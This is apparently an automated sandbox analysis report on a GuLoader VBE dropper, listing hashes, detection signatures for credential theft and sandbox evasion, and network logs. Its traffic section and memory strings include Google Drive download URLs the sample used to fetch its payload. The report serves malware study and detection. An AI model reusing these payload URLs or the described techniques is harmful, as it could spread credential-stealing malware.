Windows Analysis Report
Inquiry Studbolt - 240703.vbe

Overview

General Information

Sample name:	Inquiry Studbolt - 240703.vbe
Analysis ID:	1466653
MD5:	cac00b561578ffb0e2b2b2fd96eec0cd
SHA1:	16ffdf688abd43ccfaa46f24709ade48af5534e7
SHA256:	8876ad4754fb4f61ba5489924603d279dc023f68c1ba847020107a376de9a9ad
Infos:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Yara detected GuLoader

Yara detected Powershell download and execute

Check if machine is in data center or colocation facility

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Found suspicious powershell code related to unpacking or dynamic code loading

Hides that the sample has been downloaded from the Internet (zone.identifier)

Obfuscated command line found

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Very long command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Signatures

AV Detection

Multi AV Scanner detection for domain / URL

Source: http://pesterbdd.com/images/Pester.png4	Virustotal: Detection: 10%	Perma Link
Source: http://pesterbdd.com/images/Pester.pngh	Virustotal: Detection: 12%	Perma Link
Source: http://pesterbdd.com/images/Pester.png	Virustotal: Detection: 9%	Perma Link

Source: unknown	HTTPS traffic detected: 142.250.191.110:443 -> 192.168.11.30:49949 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.2.33:443 -> 192.168.11.30:49950 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.191.110:443 -> 192.168.11.30:49951 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.2.33:443 -> 192.168.11.30:49952 version: TLS 1.2

Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.878914102008.0000000007121000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 0000000D.00000002.878904636075.0000000002A96000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: re.pdb; source: powershell.exe, 0000000D.00000002.878917749751.0000000008791000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 0000000D.00000002.878904636075.0000000002A96000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wab.pdbGCTL source: GrOcCQC.exe, 00000010.00000000.879000905723.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, GrOcCQC.exe, 00000012.00000002.879083099115.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, GrOcCQC.exe.15.dr
Source:	Binary string: wab.pdb source: GrOcCQC.exe, GrOcCQC.exe, 00000010.00000000.879000905723.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, GrOcCQC.exe, 00000012.00000002.879083099115.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, GrOcCQC.exe.15.dr

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 208.95.112.1 208.95.112.1

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: TUT-ASUS TUT-ASUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

May check the online IP address of the machine

Source: unknown

DNS query: name: ip-api.com

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc76t5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc76t5&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1kTBjYXwSaLf73tP79eJTEXDnkCOgv_e4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1kTBjYXwSaLf73tP79eJTEXDnkCOgv_e4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc76t5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc76t5&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1kTBjYXwSaLf73tP79eJTEXDnkCOgv_e4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1kTBjYXwSaLf73tP79eJTEXDnkCOgv_e4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: ip-api.com

Source: powershell.exe, 00000009.00000002.882935125828.000002167215A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878904636075.0000000002AB1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878845480817.0000000005108000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.882847947414.0000000005102000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878864713619.0000000005108000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.880185049304.0000000005102000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000009.00000002.882935125828.000002167215A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878904636075.0000000002AB1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878845480817.0000000005108000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.882847947414.0000000005102000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878864713619.0000000005108000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.880185049304.0000000005102000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000000D.00000002.878917749751.0000000008716000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microso
Source: wab.exe, 0000000F.00000002.882856308898.0000000020C51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: wab.exe, 0000000F.00000002.882856308898.0000000020C51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000009.00000002.882848532717.000002165B480000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882926973942.0000021669E6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878910754934.0000000005737000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878910754934.0000000005874000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000009.00000002.882848532717.000002165B300000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882848532717.000002165A028000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878906475177.0000000004828000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000D.00000002.878906475177.0000000004828000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png4
Source: powershell.exe, 00000009.00000002.882848532717.000002165A028000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
Source: powershell.exe, 00000009.00000002.882848532717.000002165B32B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882848532717.000002165B300000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.pngh
Source: powershell.exe, 00000009.00000002.882848532717.0000021659E01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878906475177.00000000046D1000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.882856308898.0000000020C51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000009.00000002.882848532717.000002165B100000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000009.00000002.882848532717.000002165B300000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882848532717.000002165A028000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878906475177.0000000004828000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000D.00000002.878906475177.0000000004828000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
Source: powershell.exe, 00000009.00000002.882848532717.000002165A028000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
Source: powershell.exe, 00000009.00000002.882848532717.000002165B32B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882848532717.000002165B300000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlh
Source: powershell.exe, 00000009.00000002.882848532717.0000021659E01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000D.00000002.878906475177.00000000046D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB7q
Source: powershell.exe, 00000009.00000002.882848532717.000002165A2CD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878845630299.0000000005134000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 0000000D.00000002.878910754934.0000000005874000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.878910754934.0000000005874000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.878910754934.0000000005874000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.g
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.go
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.goo
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.goog
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.googl
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.c
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.co
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882848532717.000002165A028000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.882847947414.00000000050AE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.880185049304.00000000050AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: wab.exe, 0000000F.00000002.882847947414.00000000050AE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.880185049304.00000000050AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/FP
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/u
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?e
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?ex
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?exp
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?expo
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?expor
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=d
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=do
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=dow
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=down
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=downl
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=downlo
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=downloa
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&i
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1T
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1Tu
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3p
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pG
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGV
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQ
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQO
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOu
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuY
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYu
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0P
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PV
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1v
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vu
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuO
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOo
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOov
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOovP
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOovPZ
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc7
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc76
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc76t
Source: powershell.exe, 00000009.00000002.882848532717.000002165C802000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882848532717.000002165A028000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc76t5
Source: powershell.exe, 0000000D.00000002.878906475177.0000000004828000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc76t5pN
Source: wab.exe, 0000000F.00000002.882847947414.00000000050C4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.880185049304.00000000050C4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.882848779553.00000000053B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1kTBjYXwSaLf73tP79eJTEXDnkCOgv_e4
Source: wab.exe, 0000000F.00000002.882847947414.00000000050C4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.880185049304.00000000050C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1kTBjYXwSaLf73tP79eJTEXDnkCOgv_e4J
Source: powershell.exe, 00000009.00000002.882848532717.000002165A2D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com
Source: wab.exe, 0000000F.00000002.882847947414.0000000005102000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878864713619.0000000005134000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.880185049304.0000000005102000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: powershell.exe, 00000009.00000002.882848532717.000002165A2D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882848532717.000002165A2CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc76t5&export=download
Source: wab.exe, 0000000F.00000003.878864713619.0000000005108000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878845630299.0000000005134000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1kTBjYXwSaLf73tP79eJTEXDnkCOgv_e4&export=download
Source: wab.exe, 0000000F.00000003.880185049304.00000000050D4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.882847947414.00000000050D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1kTBjYXwSaLf73tP79eJTEXDnkCOgv_e4&export=downloadDP
Source: wab.exe, 0000000F.00000002.882847947414.00000000050EF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.880185049304.00000000050EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1kTBjYXwSaLf73tP79eJTEXDnkCOgv_e4&export=downloadSP
Source: powershell.exe, 00000009.00000002.882848532717.000002165B300000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882848532717.000002165A028000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878906475177.0000000004828000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
